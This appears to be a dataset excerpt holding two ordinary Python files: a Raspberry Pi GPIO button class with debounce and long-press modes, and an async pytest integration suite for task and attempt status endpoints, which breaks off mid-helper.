content
stringlengths
0
1.55M
import time
from signal import pause
import logging
import RPi.GPIO as GPIO

GPIO.setmode(GPIO.BCM)

logger = logging.getLogger(__name__)

# Lookup tables translating human-readable option strings to RPi.GPIO
# constants and back (used by the parse_* / print_* helpers below).
map_edge_parse = {'falling': GPIO.FALLING, 'rising': GPIO.RISING, 'both': GPIO.BOTH}
map_pull_parse = {'pull_up': GPIO.PUD_UP, 'pull_down': GPIO.PUD_DOWN, 'pull_off': GPIO.PUD_OFF}
map_edge_print = {GPIO.FALLING: 'falling', GPIO.RISING: 'rising', GPIO.BOTH: 'both'}
map_pull_print = {GPIO.PUD_UP: 'pull_up', GPIO.PUD_DOWN: 'pull_down', GPIO.PUD_OFF: 'pull_off'}


def parse_edge_key(edge):
    """Normalize an edge argument to an RPi.GPIO edge constant.

    Accepts either one of the GPIO edge constants (returned unchanged) or a
    case-insensitive string ('falling', 'rising', 'both').

    Raises:
        KeyError: if the string is not a known edge name.
    """
    if edge in [GPIO.FALLING, GPIO.RISING, GPIO.BOTH]:
        return edge
    try:
        # Fixed: the original assigned `result = edge` in the except branch
        # right before raising, which was dead code.
        return map_edge_parse[edge.lower()]
    except KeyError:
        raise KeyError('Unknown Edge type {edge}'.format(edge=edge))


def parse_pull_up_down(pull_up_down):
    """Normalize a pull-resistor argument to an RPi.GPIO PUD constant.

    Accepts either one of the GPIO PUD constants (returned unchanged) or a
    string ('pull_up', 'pull_down', 'pull_off').

    Raises:
        KeyError: if the string is not a known pull-up/down name.
    """
    if pull_up_down in [GPIO.PUD_UP, GPIO.PUD_DOWN, GPIO.PUD_OFF]:
        return pull_up_down
    try:
        return map_pull_parse[pull_up_down]
    except KeyError:
        raise KeyError('Unknown Pull Up/Down type {pull_up_down}'.format(pull_up_down=pull_up_down))


def print_edge_key(edge):
    """Return the readable name for a GPIO edge constant; unknown values pass through."""
    try:
        return map_edge_print[edge]
    except KeyError:
        return edge


def print_pull_up_down(pull_up_down):
    """Return the readable name for a GPIO PUD constant; unknown values pass through."""
    try:
        return map_pull_print[pull_up_down]
    except KeyError:
        return pull_up_down


# The function below (checkGpioStaysInState) takes a holding time (fractional
# seconds), a channel and a GPIO state. It checks that the GPIO stays in that
# state for the whole holding time: if the state changes it returns False; if
# the time elapses without a change it returns True.
def checkGpioStaysInState(holdingTime, gpioChannel, gpioHoldingState):
    """Return True if `gpioChannel` stays in `gpioHoldingState` for `holdingTime` seconds.

    Polls the pin every 0.1 s. Returns False as soon as the pin leaves the
    expected state; returns True once the holding time elapses with the pin
    still (and finally) in the expected state.
    """
    # Get a reference start time (https://docs.python.org/3/library/time.html#time.perf_counter)
    startTime = time.perf_counter()
    # Continuously check until the holding time is over
    while True:
        time.sleep(0.1)
        currentState = GPIO.input(gpioChannel)
        if holdingTime < (time.perf_counter() - startTime):
            break
        # Return if state does not match holding state
        if gpioHoldingState != currentState:
            return False
        # Else: wait
    # Final check with the last sampled state after the time expired
    if gpioHoldingState != currentState:
        return False
    return True


class SimpleButton:
    """Debounced GPIO push-button with optional long-press behaviors.

    hold_mode options:
        None            - fire `action` once per edge event.
        'Repeat'        - fire `action` immediately, then repeatedly while held.
        'Postpone'      - fire `action` once, only after the button was held
                          for `hold_time` seconds.
        'SecondFunc'    - fire `action` immediately; fire `action2` once after
                          `hold_time` seconds of holding.
        'SecondFuncRepeat' - fire `action` immediately; fire `action2`
                          repeatedly while held.
    """

    def __init__(self, pin, action=lambda *args: None, action2=lambda *args: None,
                 name=None, bouncetime=500, antibouncehack=False, edge='falling',
                 hold_time=0.3, hold_mode=None, pull_up_down='pull_up'):
        self.edge = parse_edge_key(edge)
        self.hold_time = hold_time
        self.hold_mode = hold_mode
        self.pull_up_down = parse_pull_up_down(pull_up_down)
        # Fixed: was hardcoded to True, which made `is_pressed` report the
        # inverted state for buttons wired with a pull-down resistor.
        self.pull_up = (self.pull_up_down == GPIO.PUD_UP)
        self.pin = pin
        self.name = name
        self.bouncetime = bouncetime
        self.antibouncehack = antibouncehack
        GPIO.setup(self.pin, GPIO.IN, pull_up_down=self.pull_up_down)
        self._action = action
        self._action2 = action2
        GPIO.add_event_detect(self.pin, edge=self.edge,
                              callback=self.callbackFunctionHandler,
                              bouncetime=self.bouncetime)
        self.callback_with_pin_argument = False

    def callbackFunctionHandler(self, *args):
        """Edge-event entry point registered with GPIO.add_event_detect.

        Strips the channel number RPi.GPIO prepends to the callback args
        (unless callbacks were configured to receive it), applies the optional
        anti-bounce re-check, then dispatches to the configured action(s).
        """
        if len(args) > 0 and args[0] == self.pin and not self.callback_with_pin_argument:
            logger.debug('Remove pin argument by callbackFunctionHandler - args before: {}'.format(args))
            args = args[1:]
            logger.debug('args after: \n{}'.format(args))
        if self.antibouncehack:
            # Re-sample the pin after a short delay to filter spurious edges.
            time.sleep(0.1)
            inval = GPIO.input(self.pin)
            if inval != GPIO.LOW:
                return None
        if self.hold_mode in ('Repeat', 'Postpone', 'SecondFunc', 'SecondFuncRepeat'):
            return self.longPressHandler(*args)
        else:
            logger.info('{}: execute callback'.format(self.name))
            return self.when_pressed(*args)

    @property
    def when_pressed(self):
        """Primary action callable (fired on press, semantics depend on hold_mode)."""
        logger.info('{}: action'.format(self.name))
        return self._action

    @property
    def when_held(self):
        """Secondary action callable (used by 'SecondFunc' / 'SecondFuncRepeat')."""
        logger.info('{}: action2'.format(self.name))
        return self._action2

    @when_pressed.setter
    def when_pressed(self, func):
        # Fixed: the original logged the literal '{}: set when_pressed'
        # because .format(self.name) was missing.
        logger.info('{}: set when_pressed'.format(self.name))
        self._action = func
        # Re-register event detection so the new callback takes effect.
        GPIO.remove_event_detect(self.pin)
        logger.info('add new action')
        GPIO.add_event_detect(self.pin, edge=self.edge,
                              callback=self.callbackFunctionHandler,
                              bouncetime=self.bouncetime)

    def set_callbackFunction(self, callbackFunction):
        """Backward-compatible alias for assigning `when_pressed`."""
        self.when_pressed = callbackFunction

    def longPressHandler(self, *args):
        """Dispatch press/hold behavior according to `hold_mode`."""
        logger.info('{}: longPressHandler, mode: {}'.format(self.name, self.hold_mode))
        # instant action (except Postpone mode)
        if self.hold_mode != "Postpone":
            self.when_pressed(*args)
        # action(s) after hold_time
        if self.hold_mode == "Repeat":
            # Repeated call of main action (multiple times if button is held long enough)
            while checkGpioStaysInState(self.hold_time, self.pin, GPIO.LOW):
                self.when_pressed(*args)
        elif self.hold_mode == "Postpone":
            # Postponed call of main action (once)
            if checkGpioStaysInState(self.hold_time, self.pin, GPIO.LOW):
                self.when_pressed(*args)
            # Swallow the remainder of the hold so the action fires only once.
            while checkGpioStaysInState(self.hold_time, self.pin, GPIO.LOW):
                pass
        elif self.hold_mode == "SecondFunc":
            # Call of secondary action (once)
            if checkGpioStaysInState(self.hold_time, self.pin, GPIO.LOW):
                self.when_held(*args)
            while checkGpioStaysInState(self.hold_time, self.pin, GPIO.LOW):
                pass
        elif self.hold_mode == "SecondFuncRepeat":
            # Repeated call of secondary action (multiple times if button is held long enough)
            while checkGpioStaysInState(self.hold_time, self.pin, GPIO.LOW):
                self.when_held(*args)

    def __del__(self):
        logger.debug('remove event detection')
        GPIO.remove_event_detect(self.pin)

    @property
    def is_pressed(self):
        """True while the button is physically pressed, regardless of wiring polarity."""
        if self.pull_up:
            return not GPIO.input(self.pin)
        return GPIO.input(self.pin)

    def __repr__(self):
        return '<SimpleButton-{}(pin={},edge={},hold_mode={},hold_time={},bouncetime={},antibouncehack={},pull_up_down={})>'.format(
            self.name, self.pin, print_edge_key(self.edge), self.hold_mode,
            self.hold_time, self.bouncetime, self.antibouncehack,
            print_pull_up_down(self.pull_up_down))


if __name__ == "__main__":
    print('please enter pin no to test')
    pin = int(input())
    func = lambda *args: print('FunctionCall with {}'.format(args))
    btn = SimpleButton(pin=pin, action=func, hold_mode='Repeat')
    pause()
import pytest
import time
from .utils import (init_app, init_db, clean_db, add_flow, add_run, add_step,
                    add_task, add_artifact, _test_list_resources,
                    _test_single_resource, add_metadata, get_heartbeat_ts)

pytestmark = [pytest.mark.integration_tests]


# Fixtures begin

@pytest.fixture
def cli(loop, aiohttp_client):
    return init_app(loop, aiohttp_client)


@pytest.fixture
async def db(cli):
    async_db = await init_db(cli)
    yield async_db
    await clean_db(async_db)

# Fixtures end


async def test_list_tasks(cli, db):
    """Task listings are empty before any task exists and contain the task afterwards."""
    _flow = (await add_flow(db, flow_id="HelloFlow")).body
    _run = (await add_run(db, flow_id=_flow.get("flow_id"))).body
    _step = (await add_step(db, flow_id=_run.get("flow_id"), step_name="step",
                            run_number=_run.get("run_number"), run_id=_run.get("run_id"))).body

    await _test_list_resources(cli, db, "/flows/{flow_id}/runs/{run_number}/tasks".format(**_step), 200, [])
    await _test_list_resources(cli, db, "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks".format(**_step), 200, [])

    _task = await create_task(db, step=_step)
    _task['duration'] = None
    _task['status'] = 'pending'

    await _test_list_resources(cli, db, "/flows/{flow_id}/runs/{run_number}/tasks".format(**_task), 200, [_task])
    await _test_list_resources(cli, db, "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks".format(**_task), 200, [_task])


async def test_list_tasks_non_numerical(cli, db):
    """Tasks created with a task_name list correctly; task_id stays numerical."""
    _flow = (await add_flow(db, flow_id="HelloFlow")).body
    _run = (await add_run(db, flow_id=_flow.get("flow_id"))).body
    _step = (await add_step(db, flow_id=_run.get("flow_id"), step_name="step",
                            run_number=_run.get("run_number"), run_id=_run.get("run_id"))).body

    await _test_list_resources(cli, db, "/flows/{flow_id}/runs/{run_number}/tasks".format(**_step), 200, [])
    await _test_list_resources(cli, db, "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks".format(**_step), 200, [])

    _task = await create_task(db, step=_step, task_name="bar")

    _, data = await _test_list_resources(cli, db, "/flows/{flow_id}/runs/{run_number}/tasks".format(**_task), 200, None)
    _, data = await _test_list_resources(cli, db, "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks".format(**_task), 200, None)

    assert len(data) == 1
    assert data[0]['task_name'] == 'bar'
    assert data[0]['task_id'] != 'bar'


async def test_single_task(cli, db):
    """A missing task 404s; an existing pending task is returned as-is."""
    await _test_single_resource(cli, db, "/flows/HelloFlow/runs/404/steps/none/tasks/5", 404, {})

    _task = await create_task(db)
    _task['duration'] = None
    _task['status'] = 'pending'

    await _test_single_resource(cli, db, "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}".format(**_task), 200, _task)


async def test_single_task_non_numerical(cli, db):
    """A task is addressable by its task_name while keeping a distinct task_id."""
    _task = await create_task(db, task_name="bar")

    _, data = await _test_single_resource(cli, db, "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/bar".format(**_task), 200, None)

    assert data['task_name'] == 'bar'
    assert data['task_id'] != 'bar'


async def test_list_old_metadata_task_attempts(cli, db):
    # Test tasks with old (missing attempt) metadata
    _task = await create_task(db)
    _task['duration'] = None
    _task['status'] = 'pending'
    await _test_list_resources(cli, db, "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}/attempts".format(**_task), 200, [_task])

    _artifact_first = await create_ok_artifact_for_task(db, _task)
    _artifact_second = await create_ok_artifact_for_task(db, _task, attempt=1)

    _task['status'] = 'unknown'
    _task['task_ok'] = 'location'

    _task_first_attempt = dict(_task)
    _task_second_attempt = dict(_task)

    _task_first_attempt['attempt_id'] = 0
    _task_first_attempt['finished_at'] = _artifact_first['ts_epoch']
    _task_first_attempt['duration'] = _artifact_first['ts_epoch'] - _task_first_attempt['ts_epoch']

    _task_second_attempt['attempt_id'] = 1
    _task_second_attempt['finished_at'] = _artifact_second['ts_epoch']
    _task_second_attempt['duration'] = _artifact_second['ts_epoch'] - _task_second_attempt['ts_epoch']

    await _test_list_resources(cli, db, "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks?task_id={task_id}".format(**_task), 200, [_task_second_attempt, _task_first_attempt])
    await _test_list_resources(cli, db, "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}/attempts".format(**_task), 200, [_task_second_attempt, _task_first_attempt])


async def test_old_metadata_task_with_multiple_attempts(cli, db):
    # Test tasks with old (missing attempt) metadata
    _task = await create_task(db)
    _task['duration'] = None
    _task['status'] = 'pending'
    await _test_list_resources(cli, db, "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}/attempts".format(**_task), 200, [_task])

    _artifact_first = await create_ok_artifact_for_task(db, _task)
    _artifact_second = await create_ok_artifact_for_task(db, _task, attempt=1)

    _task['status'] = 'unknown'
    _task['task_ok'] = 'location'
    _task['attempt_id'] = 1
    _task['finished_at'] = _artifact_second['ts_epoch']
    _task['duration'] = _artifact_second['ts_epoch'] - _task['ts_epoch']

    await _test_single_resource(cli, db, "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}".format(**_task), 200, _task)


async def test_task_with_attempt_metadata(cli, db):
    """Status/timestamps refine as attempt, attempt-done and attempt_ok metadata arrive."""
    _task = await create_task(db)
    _task['duration'] = None
    _task['status'] = 'pending'
    await _test_list_resources(cli, db, "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}/attempts".format(**_task), 200, [_task])

    _attempt_first = await create_task_attempt_metadata(db, _task)
    _artifact_first = await create_ok_artifact_for_task(db, _task)
    _task['started_at'] = _attempt_first['ts_epoch']
    _task['finished_at'] = _artifact_first['ts_epoch']
    _task['duration'] = _task['finished_at'] - _task['started_at']
    _task['status'] = 'unknown'
    _task['task_ok'] = 'location'
    await _test_single_resource(cli, db, "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}".format(**_task), 200, _task)

    _attempt_done_first = await create_task_attempt_done_metadata(db, _task)
    _task['status'] = 'unknown'
    _task['finished_at'] = _attempt_done_first['ts_epoch']
    _task['duration'] = _attempt_done_first['ts_epoch'] - _task['started_at']
    await _test_single_resource(cli, db, "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}".format(**_task), 200, _task)

    _attempt_ok_first = await create_task_attempt_ok_metadata(db, _task, 0, True)  # status 'completed'
    _task['status'] = 'completed'
    _task['finished_at'] = _attempt_ok_first['ts_epoch']
    _task['duration'] = _attempt_ok_first['ts_epoch'] - _task['started_at']
    # intended behavior, status refinement location field should remain empty when metadata exists.
    _task['task_ok'] = None
    await _test_single_resource(cli, db, "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}".format(**_task), 200, _task)


async def test_task_failed_status_with_heartbeat(cli, db):
    _task = await create_task(db, last_heartbeat_ts=1, status="failed")
    _task['finished_at'] = 1000  # should be last heartbeat in this case, due to every other timestamp missing.
    _task['duration'] = _task['last_heartbeat_ts'] * 1000 - _task['ts_epoch']
    await _test_list_resources(cli, db, "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}/attempts".format(**_task), 200, [_task])


async def test_task_running_status_with_heartbeat(cli, db):
    hb_freeze = get_heartbeat_ts()
    _task = await create_task(db, last_heartbeat_ts=hb_freeze)
    _task['finished_at'] = None  # should not have a finished at for running tasks.
    _task['duration'] = hb_freeze * 1000 - _task['ts_epoch']
    await _test_list_resources(cli, db, "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}/attempts".format(**_task), 200, [_task])


async def test_list_task_attempts(cli, db):
    """Both attempts list with per-attempt timestamps derived from their metadata/artifacts."""
    _task = await create_task(db)
    _task['duration'] = None
    _task['status'] = 'pending'
    await _test_list_resources(cli, db, "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}/attempts".format(**_task), 200, [_task])

    _attempt_first = await create_task_attempt_metadata(db, _task)
    _artifact_first = await create_ok_artifact_for_task(db, _task)
    _attempt_done_first = await create_task_attempt_done_metadata(db, _task)

    _attempt_second = await create_task_attempt_metadata(db, _task, attempt=1)
    _artifact_second = await create_ok_artifact_for_task(db, _task, attempt=1)

    _task_first_attempt = dict(_task)
    _task_second_attempt = dict(_task)

    _task_first_attempt['attempt_id'] = 0
    _task_first_attempt['status'] = 'unknown'
    _task_first_attempt['task_ok'] = 'location'
    _task_first_attempt['started_at'] = _attempt_first['ts_epoch']
    _task_first_attempt['finished_at'] = _attempt_done_first['ts_epoch']
    _task_first_attempt['duration'] = _task_first_attempt['finished_at'] - _task_first_attempt['started_at']

    # Second attempt counts as completed as well due to the _task_ok existing.
    _task_second_attempt['attempt_id'] = 1
    _task_second_attempt['status'] = 'unknown'
    _task_second_attempt['task_ok'] = 'location'
    _task_second_attempt['started_at'] = _attempt_second['ts_epoch']
    _task_second_attempt['finished_at'] = _artifact_second['ts_epoch']
    _task_second_attempt['duration'] = _task_second_attempt['finished_at'] - _task_second_attempt['started_at']

    await _test_list_resources(cli, db, "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks?task_id={task_id}".format(**_task), 200, [_task_second_attempt, _task_first_attempt])
    await _test_list_resources(cli, db, "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}/attempts".format(**_task), 200, [_task_second_attempt, _task_first_attempt])


async def test_task_with_attempt_ok_completed(cli, db):
    _task = await create_task(db)
    _attempt_first = await create_task_attempt_metadata(db, _task)
    _artifact_first = await create_ok_artifact_for_task(db, _task)
    _attempt_ok = await create_task_attempt_ok_metadata(db, _task, 0, True)  # status = 'completed'

    _task['started_at'] = _attempt_first['ts_epoch']
    _task['finished_at'] = _attempt_ok['ts_epoch']
    _task['duration'] = _attempt_ok['ts_epoch'] - _task['started_at']
    _task['status'] = 'completed'

    await _test_single_resource(cli, db, "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}".format(**_task), 200, _task)


async def test_task_with_attempt_ok_failed(cli, db):
    _task = await create_task(db)
    _attempt_first = await create_task_attempt_metadata(db, _task)
    _artifact_first = await create_ok_artifact_for_task(db, _task)

    _task['started_at'] = _attempt_first['ts_epoch']
    _task['finished_at'] = _artifact_first['ts_epoch']
    _task['duration'] = _task['finished_at'] - _task['started_at']
    _task['status'] = 'failed'

    _attempt_ok = await create_task_attempt_ok_metadata(db, _task, 0, False)  # status = 'failed'
    _task['finished_at'] = _attempt_ok['ts_epoch']
    _task['duration'] = _attempt_ok['ts_epoch'] - _task['started_at']

    await _test_single_resource(cli, db, "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}".format(**_task), 200, _task)


async def test_list_task_multiple_attempts_failure(cli, db):
    _task = await create_task(db)

    _attempt_first = await create_task_attempt_metadata(db, _task)
    _artifact_first = await create_ok_artifact_for_task(db, _task)
    _attempt_done_first = await create_task_attempt_done_metadata(db, _task)

    _attempt_second = await create_task_attempt_metadata(db, _task, attempt=1)
    _artifact_second = await create_ok_artifact_for_task(db, _task, attempt=1)

    # Mark first attempt as 'failure' and second as 'completed'
    _attempt_ok_first = await create_task_attempt_ok_metadata(db, _task, 0, False)  # status = 'failed'
    _attempt_ok_second = await create_task_attempt_ok_metadata(db, _task, 1, True)  # status = 'completed'

    _task_first_attempt = dict(_task)
    _task_second_attempt = dict(_task)

    _task_first_attempt['attempt_id'] = 0
    _task_first_attempt['status'] = 'failed'
    _task_first_attempt['started_at'] = _attempt_first['ts_epoch']
    _task_first_attempt['finished_at'] = _attempt_done_first['ts_epoch']
    _task_first_attempt['duration'] = _task_first_attempt['finished_at'] - _task_first_attempt['started_at']
    _task_first_attempt['finished_at'] = _attempt_ok_first['ts_epoch']
    _task_first_attempt['duration'] = _attempt_ok_first['ts_epoch'] - _task_first_attempt['started_at']

    # Second attempt counts as completed as well due to the _task_ok existing.
    _task_second_attempt['attempt_id'] = 1
    _task_second_attempt['status'] = 'completed'
    _task_second_attempt['started_at'] = _attempt_second['ts_epoch']
    _task_second_attempt['finished_at'] = _artifact_second['ts_epoch']
    _task_second_attempt['duration'] = _task_second_attempt['finished_at'] - _task_second_attempt['started_at']
    _task_second_attempt['finished_at'] = _attempt_ok_second['ts_epoch']
    _task_second_attempt['duration'] = _attempt_ok_second['ts_epoch'] - _task_second_attempt['started_at']

    await _test_list_resources(cli, db, "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks?task_id={task_id}".format(**_task), 200, [_task_second_attempt, _task_first_attempt])
    await _test_list_resources(cli, db, "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}/attempts".format(**_task), 200, [_task_second_attempt, _task_first_attempt])


async def test_task_attempts_with_attempt_metadata(cli, db):
    _task = await create_task(db)
    _task['duration'] = None
    _task['status'] = 'pending'
    await _test_list_resources(cli, db, "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}/attempts".format(**_task), 200, [_task])

    _attempt_first = await create_task_attempt_metadata(db, _task)
    _artifact_first = await create_ok_artifact_for_task(db, _task)
    _attempt_done_first = await create_task_attempt_done_metadata(db, _task)

    # attempt metadata is written but no artifacts exist yet.
    # Queries should return a second attempt at this point already!
    _attempt_second = await create_task_attempt_metadata(db, _task, attempt=1)

    _task_first_attempt = dict(_task)
    _task_second_attempt = dict(_task)

    _task_first_attempt['attempt_id'] = 0
    _task_first_attempt['task_ok'] = 'location'  # should have location for status artifact
    _task_first_attempt['status'] = 'unknown'  # 'unknown' because we cannot determine correct status from DB as attempt_ok is missing
    _task_first_attempt['started_at'] = _attempt_first['ts_epoch']
    _task_first_attempt['finished_at'] = _attempt_done_first['ts_epoch']
    _task_first_attempt['duration'] = _task_first_attempt['finished_at'] - _task_first_attempt['started_at']

    _task_second_attempt['attempt_id'] = 1
    _task_second_attempt['status'] = 'running'
    _task_second_attempt['started_at'] = _attempt_second['ts_epoch']
    _task_second_attempt['duration'] = int(round(time.time() * 1000)) - _task_second_attempt['started_at']

    await _test_list_resources(cli, db, "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks?task_id={task_id}".format(**_task), 200, [_task_second_attempt, _task_first_attempt], approx_keys=["duration"])
    await _test_list_resources(cli, db, "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}/attempts".format(**_task), 200, [_task_second_attempt, _task_first_attempt], approx_keys=["duration"])

    # Write attempt_ok data for first attempt to check for status changes.
    _first_attempt_ok = await create_task_attempt_ok_metadata(db, _task, 0, False)

    # NOTE: in current implementation, attempt_ok overrides attempt-done as a more accurate timestamp for finished_at.
    _task_first_attempt['finished_at'] = _first_attempt_ok['ts_epoch']
    _task_first_attempt['duration'] = _task_first_attempt['finished_at'] - _task_first_attempt['started_at']
    _task_first_attempt['task_ok'] = None  # should have no task_ok location, as status can be determined from db.
    _task_first_attempt['status'] = 'failed'  # 'failed' because now we have attempt_ok false in db.

    await _test_list_resources(cli, db, "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks?task_id={task_id}".format(**_task), 200, [_task_second_attempt, _task_first_attempt], approx_keys=["duration"])
    await _test_list_resources(cli, db, "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}/attempts".format(**_task), 200, [_task_second_attempt, _task_first_attempt], approx_keys=["duration"])


async def test_task_attempt_statuses_with_attempt_ok_failed(cli, db):
    _task = await create_task(db)
    _task['duration'] = None
    _task['status'] = 'pending'
    await _test_list_resources(cli, db, "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}/attempts".format(**_task), 200, [_task])

    _attempt_first = await create_task_attempt_metadata(db, _task)
    _artifact_first = await create_ok_artifact_for_task(db, _task)
    _attempt_done_first = await create_task_attempt_done_metadata(db, _task)
    _attempt_ok_first = await create_task_attempt_ok_metadata(db, _task, 0, False)  # status = 'failed'

    _attempt_second = await create_task_attempt_metadata(db, _task, attempt=1)
    _attempt_done_second = await create_task_attempt_done_metadata(db, _task, attempt=1)
    _attempt_ok_second = await create_task_attempt_ok_metadata(db, _task, 1, True)  # status = 'completed'

    _task_first_attempt = dict(_task)
    _task_second_attempt = dict(_task)

    # NOTE: In the current implementation attempt_ok overrides attempt-done ts_epoch as the finished_at
    # as a more accurate timestamp for when a task finished.
    _task_first_attempt['attempt_id'] = 0
    _task_first_attempt['status'] = 'failed'
    _task_first_attempt['started_at'] = _attempt_first['ts_epoch']
    _task_first_attempt['finished_at'] = _attempt_ok_first['ts_epoch']
    _task_first_attempt['duration'] = _task_first_attempt['finished_at'] - _task_first_attempt['started_at']

    _task_second_attempt['attempt_id'] = 1
    _task_second_attempt['status'] = 'completed'
    _task_second_attempt['started_at'] = _attempt_second['ts_epoch']
    _task_second_attempt['finished_at'] = _attempt_ok_second['ts_epoch']
    _task_second_attempt['duration'] = _task_second_attempt['finished_at'] - _task_second_attempt['started_at']

    await _test_list_resources(cli, db, "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks?task_id={task_id}".format(**_task), 200, [_task_second_attempt, _task_first_attempt])
    await _test_list_resources(cli, db, "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}/attempts".format(**_task), 200, [_task_second_attempt, _task_first_attempt])


# Test cases from the google docs table.
# status 'completed' tests
#
# STATUS: attempt_ok in task metadata for the attempt is set to True
# STARTED_AT: created_at property for attempt attribute for the attempt in task metadata
# FINISHED_AT: created_at property for attempt_ok attribute for the attempt in task metadata
# NOTE: for a more accurate finished_at timestamp, use the greatest timestamp out of task_ok / attempt_ok / attempt-done
# as this is the latest write_timestamp for the task

async def test_task_attempt_status_completed(cli, db):
    """A task becomes 'completed' once attempt_ok=True metadata is written."""
    _task = await create_task(db)
    _task['duration'] = None
    _task['status'] = 'pending'
    await _test_list_resources(cli, db, "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}/attempts".format(**_task), 200, [_task])

    _attempt = await create_task_attempt_metadata(db, _task, 0)
    _attempt_ok = await create_task_attempt_ok_metadata(db, _task, 0, True)
    _attempt_done = await create_task_attempt_done_metadata(db, _task, 0)

    _task['status'] = 'completed'
    _task['started_at'] = _attempt['ts_epoch']
    _task['finished_at'] = _attempt_done['ts_epoch']
    _task['duration'] = _task['finished_at'] - _task['started_at']

    await _test_list_resources(cli, db, "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}/attempts".format(**_task), 200, [_task])


# status 'running' tests
#
# STATUS 'running':
#   Has all of
#     Has a start time (NOTE: this requires 'attempt' metadata to be present)
#     attempt_ok does not exist in the task metadata
#     Has logged a heartbeat in the last x minutes (NOTE: we actually rely on heartbeat for running status.)
#     No subsequent attempt exists
# STARTED_AT: created_at property for attempt attribute for the attempt in task metadata
# FINISHED_AT: does not apply (NULL)

async def test_task_attempt_status_running(cli, db):
    """A heartbeating task with attempt metadata but no attempt_ok stays 'running'."""
    _task = await create_task(db, last_heartbeat_ts=get_heartbeat_ts())  # default status: 'running'
    _task['duration'] = _task['last_heartbeat_ts'] * 1000 - _task['ts_epoch']
    await _test_list_resources(cli, db, "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}/attempts".format(**_task), 200, [_task])

    _attempt = await create_task_attempt_metadata(db, _task, 0)
    _task['started_at'] = _attempt['ts_epoch']
    _task['finished_at'] = None
    _task['duration'] = _task['last_heartbeat_ts'] * 1000 - _task['started_at']

    await _test_list_resources(cli, db, "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}/attempts".format(**_task), 200, [_task])


# status 'failed' tests
#
# STATUS:
#   Either of
#     attempt_ok in task metadata for the attempt is set to False
#     No heartbeat has been logged for the task in the last x minutes and no new attempt has started
#     A newer attempt exists
# STARTED_AT: created_at property for attempt attribute for the attempt in task metadata
# FINISHED_AT:
#   Either of (in priority)
#     created_at property for attempt_ok attribute for the attempt in task metadata
#     The timestamp in the heartbeat column for the task if no subsequent attempt is detected
#     If a subsequent attempt exists, use the start time of the subsequent attempt

async def test_task_attempt_status_failed_with_existing_subsequent_attempt(cli, db):
    """Attempt 0 is reported 'failed' (finished at attempt 1's start) once attempt 1 begins."""
    _task = await create_task(db, last_heartbeat_ts=get_heartbeat_ts())
    _task['duration'] = _task['last_heartbeat_ts'] * 1000 - _task['ts_epoch']
    await _test_list_resources(cli, db, "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}/attempts".format(**_task), 200, [_task])

    _first_attempt = dict(_task)
    _second_attempt = dict(_task)

    # we explicitly leave out attempt completion metadata for attempt 0 to test that it fails correctly
    # when attempt 1 exists.

    # ATTEMPT-0
    _first_attempt_meta = await create_task_attempt_metadata(db, _task, 0)
    _first_attempt['started_at'] = _first_attempt_meta['ts_epoch']
    _first_attempt['duration'] = _first_attempt['last_heartbeat_ts'] * 1000 - _first_attempt['started_at']
    await _test_list_resources(cli, db, "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}/attempts".format(**_task), 200, [_first_attempt])

    # ATTEMPT-1
    _second_attempt_meta = await create_task_attempt_metadata(db, _task, 1)
    _second_attempt['attempt_id'] = 1
    _second_attempt['started_at'] = _second_attempt_meta['ts_epoch']
    _second_attempt['duration'] = _second_attempt['last_heartbeat_ts'] * 1000 - _second_attempt['started_at']

    # first attempt should be failed due to second attempt existing.
    # finished_at timestamp should be the started_at of the second attempt due to it existing.
    _first_attempt['status'] = 'failed'
    _first_attempt['finished_at'] = _second_attempt['started_at']
    _first_attempt['duration'] = _first_attempt['finished_at'] - _first_attempt['started_at']

    await _test_list_resources(cli, db, "/flows/{flow_id}/runs/{run_number}/steps/{step_name}/tasks/{task_id}/attempts".format(**_task), 200, [_second_attempt, _first_attempt])


# Resource Helpers / factories

async def create_ok_artifact_for_task(db, task, attempt=0):
    "Creates and returns a _task_ok artifact for a task"
    _task = (await add_artifact(
        db,
        flow_id=task.get("flow_id"),
        run_number=task.get("run_number"),
        run_id=task.get("run_id"),
        step_name=task.get("step_name"),
